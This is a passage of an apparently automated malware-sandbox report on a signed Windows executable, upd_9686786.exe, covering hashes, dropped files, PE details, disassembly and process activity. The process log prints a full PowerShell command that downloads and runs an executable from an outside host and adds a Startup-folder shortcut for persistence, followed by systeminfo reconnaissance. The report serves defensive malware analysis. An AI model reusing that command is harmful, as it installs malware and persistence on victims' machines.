                                                                                                                  SWIFT_PDF.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 64.176.178.205
                                                                                                                  PO904321.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 64.176.178.205
                                                                                                                  0988986.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • 64.176.178.205
                                                                                                                  YJIznOmBnQ.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  gYkk20cK3U.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  YB4glv2lGj.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  GxYt5Gt7c6.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136
                                                                                                                  rdOqlg6UQp.ps1Get hashmaliciousNetSupport DownloaderBrowse
                                                                                                                  • 65.108.196.136

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0gsx0sm.gmi.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbrgwyvk.gyb.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpsfeg15.nww.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye1q3xtv.ggv.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Oct 1 10:19:13 2024, mtime=Tue Oct 1 16:19:43 2024, atime=Tue Oct 1 16:19:40 2024, length=92408, window=hide
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):659
                                                                                                                  Entropy (8bit):4.988690184865966
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:8mF+l8ChzYNbRnmoSlA88C0djA2Z6yRlaqw7PlmCt:8m4l8ZnnmAm0ZA+6w8m
                                                                                                                  MD5:CB5E59797EF5AEBAAA1CDF54CA3FBD96
                                                                                                                  SHA1:0E67E31080C0B0623A31836A70D155F545A9BFE1
                                                                                                                  SHA-256:C23E240A88CEFDB51BB0B5BE4ED58B7EB8CE00FB73C1DF460AB70EB24E4FE816
                                                                                                                  SHA-512:0D666904A488AEB8AAE57DC5D0FBCD611B4D7E3B4D9FD516CA44A0A3E7E74AF43AA821DAA6F401C6D2AB7F94FAD237BB60A013D5E1638C4210F65C2F8F6B6071
                                                                                                                  Malicious:true
                                                                                                                  Preview:L..................F.... ...a;..........&....oc.&....h...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....6......G..&.....l.2..h..AYu. .UPD_96~1.EXE..P......AYgZAYu.....e.....................>...u.p.d._.9.6.8.6.7.8.6...e.x.e.......V...............-.......U.............H......C:\Users\user\Desktop\upd_9686786.exe..,.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.p.d._.9.6.8.6.7.8.6...e.x.e...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.e.s.k.t.o.p.`.......X.......287400..............n4UB.. .|..o.v.......A.P..#.....n4UB.. .|..o.v.......A.P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                  Entropy (8bit):6.564982781459938
                                                                                                                  TrID:
                                                                                                                  • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                  • DOS Executable Generic (2002/1) 12.50%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                  File name:upd_9686786.exe
                                                                                                                  File size:92'408 bytes
                                                                                                                  MD5:22f545cf93f55d3294abbbc7bfbbd6b8
                                                                                                                  SHA1:9f3fcce983368fe70ddf070919f2516981934885
                                                                                                                  SHA256:b93d7961d05376e6aa0e6d122ae50f34db078acc9e95ed6408f39750d386a74a
                                                                                                                  SHA512:8dc07b8ee3fa90316ef67283b96f87a1e664388698973af325f73217e896877272c03c9589cd9ca2ef6029e95c89fd89e7f064dd126449e2a9c18ec20e72d64a
                                                                                                                  SSDEEP:1536:+XzqM7EOkXqampZzmvzqzYgM3djwbymSiIjDe1p8t63/jH:IYPXqZmvzqzC9wxR1yMj
                                                                                                                  TLSH:37937DA3595535E6F40714B488E3D38A0B38FFB4979295DD31D83D3C7BE28E88628792
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.@........&....*.`.....................@..........................................`... ............................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:0f538594b2676d17

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x140001000
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x140000000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                  Time Stamp:0x66DEED9B [Mon Sep 9 12:44:11 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:970725500d4c590551cb7610a5fb002e

                                                                                                                  Authenticode Signature

                                                                                                                  Signature Valid:true
                                                                                                                  Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                  Signature Validation Error:The operation completed successfully
                                                                                                                  Error Number:0
                                                                                                                  Not Before, Not After
                                                                                                                  • 03/09/2024 10:28:18 03/09/2025 10:28:17
                                                                                                                  Subject Chain
                                                                                                                  • CN="Foshan Yongqiheng Trading Co., Ltd.", O="Foshan Yongqiheng Trading Co., Ltd.", L=Foshan, S=Guangdong, C=CN, SERIALNUMBER=91440605MA55WQT94L, OID.1.3.6.1.4.1.311.60.2.1.1=Foshan, OID.1.3.6.1.4.1.311.60.2.1.2=Guangdong, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:272EC0528A8BC9E66763B3D4B60C3E4B
                                                                                                                  Thumbprint SHA-1:36A0F423C1FA48F172E4FECD06B8099F0EBBAEB8
                                                                                                                  Thumbprint SHA-256:CB2C8BD38AEF6CA2150B078285758AC1F6A2A8BA36E7A315E4B8300974A13B6B
                                                                                                                  Serial:672237253A9B7EF9D02D7D1CB27A3FF4

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  dec eax
                                                                                                                  sub esp, 00000638h
                                                                                                                  dec eax
                                                                                                                  lea ebp, dword ptr [esp+00000200h]
                                                                                                                  dec eax
                                                                                                                  lea edx, dword ptr [00000551h]
                                                                                                                  push edx
                                                                                                                  dec eax
                                                                                                                  lea edx, dword ptr [00000002h]
                                                                                                                  push edx
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  dec eax
                                                                                                                  mov ebp, esp
                                                                                                                  dec eax
                                                                                                                  sub esp, 60h
                                                                                                                  cmp cx, 137Bh
                                                                                                                  jne 00007F9128435731h
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-5Bh], eax
                                                                                                                  dec esp
                                                                                                                  or dword ptr [ebp-35h], edx
                                                                                                                  mov ecx, dword ptr [ebp-5Fh]
                                                                                                                  dec esp
                                                                                                                  add eax, dword ptr [ebp-18h]
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [ebp-32h], edx
                                                                                                                  cmp edx, 51F34DF3h
                                                                                                                  je 00007F9128435726h
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-1Fh], edx
                                                                                                                  dec ecx
                                                                                                                  mov ebx, ecx
                                                                                                                  dec esp
                                                                                                                  add dword ptr [ebp-23h], ecx
                                                                                                                  dec ebp
                                                                                                                  cmp ecx, eax
                                                                                                                  jmp 00007F912843582Bh
                                                                                                                  call 00007F9128435A4Ch
                                                                                                                  mov dword ptr [ebp-42h], edx
                                                                                                                  dec ecx
                                                                                                                  sub edx, 0000B833h
                                                                                                                  xor ecx, edx
                                                                                                                  dec eax
                                                                                                                  sub eax, dword ptr [00005F8Dh]
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [ebp-0Bh], edx
                                                                                                                  mov edx, dword ptr [00005F87h]
                                                                                                                  lea edx, dword ptr [00005F86h]
                                                                                                                  dec eax
                                                                                                                  mov edx, dword ptr [ebp-4Eh]
                                                                                                                  mov eax, 0000C14Ch
                                                                                                                  dec esp
                                                                                                                  sub eax, dword ptr [ebp-12h]
                                                                                                                  cmp eax, dword ptr [00005F6Fh]
                                                                                                                  jne 00007F9128435744h
                                                                                                                  dec esp
                                                                                                                  add dword ptr [00005F66h], ebx
                                                                                                                  dec ebp
                                                                                                                  mov edx, eax
                                                                                                                  mov cl, byte ptr [ebp-34h]
                                                                                                                  mov edx, eax
                                                                                                                  add edx, 0000873Eh
                                                                                                                  dec ebp
                                                                                                                  mov ecx, edx
                                                                                                                  add ecx, ecx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-4Fh], ebx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-53h], ebx
                                                                                                                  dec esp
                                                                                                                  mov dword ptr [ebp-0Bh], edx
                                                                                                                  mov dword ptr [ebp-59h], eax
                                                                                                                  mov ecx, 0000593Eh

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x140.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd0000x9e38.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x140000x28f8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x170000x8c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xc0800x40.idata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x5e700x6000ee60c30397ec0937ce6efca219e666dfFalse0.6846923828125data6.132032476401386IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x70000x11f00x12003272739aedcb22a2fb1771a34e5495ecFalse0.4409722222222222data4.693899156508856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rdata0x90000x25300x26002a37e4106e4c51e925f62df186175948False0.6062911184210527data5.042837533503447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .idata0xc0000x1400x200c620907a6266d59213fe2218e4a2e6c6False0.28515625data2.123589479505298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0xd0000x9e380xa000ed6b679ce9904e4382dd5e34b6ed6603False0.3566650390625data5.727163119406358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x170000x8c0x2002fb7b3429ddc1b32b72c3399054c02d8False0.291015625data1.827351060008176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xd1400x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.3554235862938827
                                                                                                                  RT_GROUP_ICON0x165e80x14dataEnglishUnited States1.15
                                                                                                                  RT_VERSION0x166000x314dataEnglishUnited States0.41624365482233505
                                                                                                                  RT_MANIFEST0x169180x51fXML 1.0 document, ASCII textEnglishUnited States0.3707093821510298

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllExitProcess, GetProcAddress, LoadLibraryA
                                                                                                                  msvcrt.dllgetenv, rand, srand

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:13:19:40
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\upd_9686786.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Desktop\upd_9686786.exe"
                                                                                                                  Imagebase:0x7ff76e650000
                                                                                                                  File size:92'408 bytes
                                                                                                                  MD5 hash:22F545CF93F55D3294ABBBC7BFBBD6B8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
                                                                                                                  Imagebase:0x7ff7fdba0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:cmd.exe /c systeminfo
                                                                                                                  Imagebase:0x7ff6092b0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:13:19:49
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:systeminfo
                                                                                                                  Imagebase:0x7ff7493d0000
                                                                                                                  File size:110'080 bytes
                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:13:20:01
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\upd_9686786.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Desktop\upd_9686786.exe"
                                                                                                                  Imagebase:0x7ff76e650000
                                                                                                                  File size:92'408 bytes
                                                                                                                  MD5 hash:22F545CF93F55D3294ABBBC7BFBBD6B8
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
                                                                                                                  Imagebase:0x7ff7fdba0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:cmd.exe /c systeminfo
                                                                                                                  Imagebase:0x7ff6092b0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6c1c60000
                                                                                                                  File size:875'008 bytes
                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:13:20:09
                                                                                                                  Start date:01/10/2024
                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:systeminfo
                                                                                                                  Imagebase:0x7ff7493d0000
                                                                                                                  File size:110'080 bytes
                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:7.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:14.3%
                                                                                                                    Total number of Nodes:70
                                                                                                                    Total number of Limit Nodes:12
